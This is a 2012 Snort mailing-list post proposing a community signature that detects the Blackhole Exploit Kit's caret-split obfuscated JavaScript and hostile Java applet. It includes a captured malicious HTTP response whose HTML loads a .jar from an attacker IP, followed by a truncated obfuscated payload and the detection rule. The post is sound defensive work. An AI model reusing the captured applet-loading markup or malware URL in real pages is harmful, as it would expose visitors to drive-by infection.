[Snort-sigs] Proposed Signature - COMMUNITY SPECIFIC-THREATS Blackhole Exploit Kit JavaScript carat string splitting with hostile applet

Community Proposed lists at ...3397...
Tue Feb 21 14:16:17 EST 2012


12:08:49.734573 IP 65.75.137.95.80 > a.b.c.d.3586: . 1:1461(1460) ack 567 win 6792
HTTP/1.1 200 OK
Date: Tue, 21 Feb 2012 19:30:23 GMT
Server: nginx/0.7.65
Content-Type: text/html
X-Powered-By: PHP/5.3.2
Connection: close
Transfer-Encoding: chunked

4ef
<html><body><applet code='Photo.class'
archive='http://65.75.137.95/content/jav.jar'><param
value="vssMlgg=9Po9Pd%oP/9gOFU6gYPMvM-Vcd=G6cr" name="p"/></applet><div
style="display:none;"><p>@wpg9p@^p^@pg^p[... remainder of the carat-delimited obfuscated JavaScript payload omitted: the list archive's address obfuscation has mangled it beyond recovery ...]
333

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"COMMUNITY SPECIFIC-THREATS Blackhole Exploit Kit JavaScript carat string splitting with hostile applet"; \
  flow:established,from_server; \
  content:"<html><body><applet|20|"; fast_pattern; \
  content:"|20|code="; distance:0; \
  content:"|20|archive="; distance:0; \
  content:"|3a|none|3b|"; distance:0; nocase; \
  pcre:"/([@\x2da-z0-9]*?\x5e){50,}/Oi"; \
  classtype:trojan-activity; \
  reference:url,community.websense.com/blogs/securitylabs/pages/black-hole-exploit-kit.aspx; \
  sid:x; rev:1;)

Thanks,
Nathan
